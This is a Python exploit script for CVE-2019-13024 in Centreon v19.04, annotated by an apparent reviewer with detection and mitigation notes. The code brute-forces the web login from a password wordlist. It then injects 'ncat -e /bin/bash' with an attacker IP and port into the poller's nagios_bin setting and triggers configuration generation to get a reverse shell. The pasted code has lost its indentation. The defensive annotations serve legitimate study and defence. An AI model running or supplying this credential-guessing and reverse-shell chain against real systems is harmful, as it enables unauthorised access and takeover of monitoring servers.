- #!/usr/bin/python
- '''
- # Exploit Title: Centreon v19.04 authenticated Remote Code Execution
- # Date: 28/06/2019
- # Exploit Author: Askar (@mohammadaskar2)
- # CVE : CVE-2019-13024
- # Vendor Homepage: https://www.centreon.com/
- # Software link: https://download.centreon.com
- # Version: v19.04
- # Tested on: CentOS 7.6 / PHP 5.4.16
- '''
- import requests
- import sys
- import warnings
- from bs4 import BeautifulSoup
# Reviewer annotation (lines starting with "#" at column 0 are added; lines
# carrying the paste's "- " list marker are the original, unchanged).
# The paste lost its indentation, so the extent of the for/if bodies below
# cannot be read from layout.
# Per the visible statements, the script tries one Centreon web login per line
# of best110.txt. When the failure banner is absent it rewrites the poller's
# "nagios_bin" setting and then requests configuration generation. The file
# header attributes this to CVE-2019-13024 on Centreon v19.04.
- # turn off BeautifulSoup warnings
- warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
# Exactly five arguments are required; the usage string names them
# url / username / password / ip / port.
- if len(sys.argv) != 6:
- print(len(sys.argv))
- print("[~] Usage : ./centreon-exploit.py url username password ip port")
- exit()
# Two local wordlists are read. Only plist is used below; ulist is never
# referenced again in this listing.
- with open('best110.txt', 'r') as passlist:
- plist = passlist.readlines()
- with open('tt.txt', 'r') as userlist:
- ulist = userlist.readlines()
# Password-guessing loop: the candidate comes from the wordlist, not from the
# command line (sys.argv[3] is never read).
# Defender view: each attempt is a GET of /index.php followed by a POST of
# /index.php carrying useralias / password / submitLogin / centreon_token.
# Many such pairs from one client with failing logins are visible in the
# web-server access log. Rate limiting or lockout in front of the login form
# bounds this loop.
- for password in plist:
- password=password.strip()
- url = sys.argv[1]
- username = sys.argv[2]
- ip = sys.argv[4]
- port = sys.argv[5]
# A new requests session is created here, so cookies from an earlier attempt
# are not reused.
- request = requests.session()
- print("[+] Retrieving CSRF token to submit the login form")
- page = request.get(url+"/index.php")
- html_content = page.text
# BeautifulSoup is called without naming a parser, which is presumably the
# warning silenced at the top.
- soup = BeautifulSoup(html_content)
# The token is taken from the fourth input element by position; the element's
# name is not checked.
- token = soup.findAll('input')[3].get("value")
- login_info = {
- "useralias": username,
- "password": password,
- "submitLogin": "Connect",
- "centreon_token": token
- }
- login_request = request.post(url+"/index.php", login_info)
- print("[+] Login token is : {0}".format(token))
# Success is inferred only from the absence of this banner text; any other
# response body is treated as a valid login.
- if "Your credentials are incorrect." not in login_request.text:
- print("[+] Logged In Sucssfully", username, password)
- print("[+] Retrieving Poller token")
# p=60901 is the page the script calls the poller configuration page. A second
# anti-CSRF token is read from the 25th input element, again by position.
- poller_configuration_page = url + "/main.get.php?p=60901"
- get_poller_token = request.get(poller_configuration_page)
- poller_html = get_poller_token.text
- poller_soup = BeautifulSoup(poller_html)
- poller_token = poller_soup.findAll('input')[24].get("value")
- print("[+] Poller token is : {0}".format(poller_token))
# Form body for the poller edit. Every path-like field holds a filesystem path
# except nagios_bin, which holds a command line built from the ip and port
# arguments.
# Defender view: audit the stored poller settings. A nagios_bin value that is
# not a plain path to the monitoring-engine binary (spaces, shell
# metacharacters, network tools) indicates tampering.
- payload_info = {
- "name": "Central",
- "ns_ip_address": "127.0.0.1",
- # this value should be 1 always
- "localhost[localhost]": "1",
- "is_default[is_default]": "0",
- "remote_id": "",
- "ssh_port": "22",
- "init_script": "centengine",
- # this value contains the payload , you can change it as you want
- "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
- "nagiostats_bin": "/usr/sbin/centenginestats",
- "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
- "centreonbroker_cfg_path": "/etc/centreon-broker",
- "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
- "centreonbroker_logs_path": "",
- "centreonconnector_path": "/usr/lib64/centreon-connector",
- "init_script_centreontrapd": "centreontrapd",
- "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
- "ns_activate[ns_activate]": "1",
- "submitC": "Save",
- "id": "1",
- "o": "c",
- "centreon_token": poller_token,
- }
# The response is stored in send_payload but never inspected.
- send_payload = request.post(poller_configuration_page, payload_info)
- print("[+] Injecting Done, triggering the payload")
- print("[+] Check your netcat listener !")
# Second stage: a POST to the configuration-generation endpoint for poller 1.
# The script's own messages state that this request is what runs the stored
# nagios_bin value.
# Detection:
#   - a POST to main.get.php?p=60901 followed shortly by a POST to
#     generateFiles.php in the same session;
#   - shell or network-tool child processes under the web/engine service
#     account;
#   - unexpected outbound connections from the monitoring host.
# Mitigation:
#   - install the vendor release that addresses CVE-2019-13024;
#   - limit poller-configuration rights to the few accounts that need them;
#   - enforce strong, non-wordlist passwords;
#   - restrict outbound traffic from the Centreon server.
- generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"
- xml_page_data = {
- "poller": "1",
- "debug": "true",
- "generate": "true",
- }
- request.post(generate_xml_page, xml_page_data)
- #else:
- #print("[-] Wrong credentials", password, username)